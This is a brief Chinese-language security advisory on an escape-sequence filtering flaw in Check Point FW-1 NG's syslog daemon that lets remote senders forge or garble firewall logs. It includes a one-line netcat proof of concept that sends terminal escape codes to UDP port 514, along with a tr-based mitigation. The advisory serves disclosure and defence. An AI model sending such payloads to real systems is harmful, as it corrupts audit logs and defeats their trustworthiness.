Check Point FW-1 Syslog守护进程未过滤转义序列漏洞发布时间:2003-03-21 更新时间:2003-03-21 严重程度:低 威胁程度:欺骗 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:7161 受影响系统 Check Point Software Next Generation FP3 HF2详细描述 Check Point FW-1 syslog守护进程在处理转义序列时没有充分过滤,攻击者可以提交包含转义序列的字符的日志消息给syslog守护程序,可导致产生欺骗日志,使日志不可信。 测试代码 [attacker]# echo -e "<189>19: 00:01:04: Test\a\033[2J\033[2;5m\033[1;31mHACKER~ ATTACK\033[2;25m\033[22;30m\033[3q" | nc -u firewall 514 解决方案 使用"tr"过滤日志输出: [firewall]# fw log -tfnl | tr '\000-\011\013-\037\200-\377' '*' 相关信息 报告:Dr. Peter Bieringer <pbieringer@aerasec.de> 相关资料:http://www.aerasec.de/security/advisories/txt/checkpoint-fw1-ng-fp3-syslog-crash.txt http://www.aerasec.de/security/advisories/txt/checkpoint-fw1-ng-fp3-syslog-crash.txt |
